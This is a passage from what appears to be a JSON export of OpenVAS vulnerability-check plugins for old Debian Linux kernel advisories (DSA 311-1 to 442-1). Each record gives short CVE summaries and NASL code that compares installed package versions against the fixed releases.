packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory covers only the powerpc architecture. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in version 2.4.18-1woody1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 2.4.20-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 312-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20312-1\";\n\nif(description)\n{\n script_id(53601);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.18-powerpc\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-newpmac\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc-smp\", ver:\"2.4.18-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:13", "references": [], "pluginID": "53625", "description": "The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2.20-i386\nannounced via advisory DSA 336-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 336-1 (kernel-source-2.2.20, kernel-image-2.2.20-i386)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53625", "id": "OPENVAS:53625", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_336_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 336-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory provides updated 2.2.20 kernel source, and binary kernel\nimages for the i386 architecture. Other architectures and kernel\nversions will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these\nproblems have been fixed in kernel-source-2.2.20 version\n2.2.20-5woody2 and kernel-image-i386 version 2.2.20-5woody3.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.2.25 and kernel-image-2.2.25-i386 version 2.2.25-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\n\nNOTE: These kernels are not binary-compatible with the previous\nversion. Any loadable modules will need to be recompiled in order to\nwork with the new kernel.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2.20-i386\nannounced via advisory DSA 336-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20336-1\";\n\nif(description)\n{\n script_id(53625);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 336-1 (kernel-source-2.2.20, kernel-image-2.2.20-i386)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-compact\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-idepci\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-compact\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-idepci\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "references": [], "pluginID": "53621", "description": "The remote host is missing an update to kernel-source-2.4.17, kernel-patch-2.4.17-mips\nannounced via advisory DSA 332-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 332-1 (kernel-source-2.4.17, kernel-patch-2.4.17-mips)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53621", "id": "OPENVAS:53621", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_332_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 332-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous packets or kernel\nmemory by using malformed packets\n\n- - CVE-2003-0127: The kernel module loader allows local users to gain\nroot privileges by using ptrace to attach to a child process that is\nspawned by the kernel\n\n- - CVE-2003-0244: The route cache implementation in Linux 2.4, and the\nNetfilter IP conntrack module, allows remote attackers to cause a\ndenial of service (CPU consumption) via packets with forged source\naddresses that cause a large number of hash table collisions related\nto the PREROUTING chain\n\n- - CVE-2003-0246: The ioperm system call in Linux kernel 2.4.20 and\nearlier does not properly restrict privileges, which allows local\nusers to gain read or write access to certain I/O ports.\n\n- - CVE-2003-0247: vulnerability in the TTY layer of the Linux kernel\n2.4 allows attackers to cause a denial of service ('kernel oops')\n\n- - CVE-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers\nto modify CPU state registers via a malformed address.\n\n- - CVE-2003-0364: The TCP/IP fragment reassembly handling in the Linux\nkernel 2.4 allows remote attackers to cause a denial of service (CPU\nconsumption) via certain packets that cause a large number of hash\ntable collisions\n\nThis advisory provides corrected source code for Linux 2.4.17, and\ncorrected binary kernel images for the mips and mipsel architectures.\nOther versions and architectures will be covered by separate\nadvisories.\n\nFor the stable distribution (woody), these problems have been fixed in\nkernel-source-2.4.17 version 2.4.17-1woody1 and\nkernel-patch-2.4.17-mips version 2.4.17-0.020226.2.woody2.\n\nFor the unstable distribution (sid) these problems are fixed in\nkernel-source-2.4.20 version 2.4.20-8.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.17, kernel-patch-2.4.17-mips\nannounced via advisory DSA 332-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20332-1\";\n\nif(description)\n{\n script_id(53621);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 332-1 (kernel-source-2.4.17, kernel-patch-2.4.17-mips)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-mips\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-ip22\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r5k-ip22\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r3k-kn02\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-kn04\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.17\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mkcramfs\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:55", "references": [], "pluginID": "53694", "description": "The remote host is missing an update to kernel\nannounced via advisory DSA 311-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 311-1 (kernel)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53694", "id": "OPENVAS:53694", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_311_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 311-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nThis advisory covers only the i386 (Intel IA32) architectures. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the i386 architecture, these\nproblems have been fixed in kernel-source-2.4.18 version 2.4.18-9,\nkernel-image-2.4.18-1-i386 version 2.4.18-8, and\nkernel-image-2.4.18-i386bf version 2.4.18-5woody1.\n\nFor the unstable distribution (sid) these problems are fixed in the\n2.4.20 series kernels based on Debian sources.\n\nWe recommend that you update your kernel packages.\n\nIf you are using the kernel installed by the installation system when\nthe 'bf24' option is selected (for a 2.4.x kernel), you should install\nthe kernel-image-2.4.18-bf2.4 package. If you installed a different\nkernel-image package after installation, you should install the\ncorresponding 2.4.18-1 kernel. You may use the table below as a\nguide.\n\n* If 'uname -r' shows: * Install this package:\n- ------------------------------------------------------\n* 2.4.18-bf2.4 * kernel-image-2.4.18-bf2.4\n* 2.4.18-386 * kernel-image-2.4.18-1-386\n* 2.4.18-586tsc * kernel-image-2.4.18-1-586tsc\n* 2.4.18-686 * kernel-image-2.4.18-1-686\n* 2.4.18-686-smp * kernel-image-2.4.18-1-686-smp\n* 2.4.18-k6 * kernel-image-2.4.18-1-k6\n* 2.4.18-k7 * kernel-image-2.4.18-1-k7\n\nNOTE: that this kernel is not binary compatible with the previous\nversion. For this reason, the kernel has a different version number\nand will not be installed automatically as part of the normal upgrade\nprocess. Any custom modules will need to be rebuilt in order to work\nwith the new kernel. New PCMCIA modules are provided for all of the\nabove kernels.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory DSA 311-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20311-1\";\n\nif(description)\n{\n script_id(53694);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 311-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-bf2.4\", ver:\"2.4.18-5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-bf2.4\", ver:\"2.4.18-5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.18\", ver:\"2.4.18-9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.18\", ver:\"2.4.18-9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.18-bf2.4\", ver:\"3.1.33-6woody1k5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "references": [], "pluginID": "53142", "description": "The remote host is missing an update to kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390\nannounced via advisory DSA 442-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 442-1 (kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0961", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0985", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2004-0077"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53142", "id": "OPENVAS:53142", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_442_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 442-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software 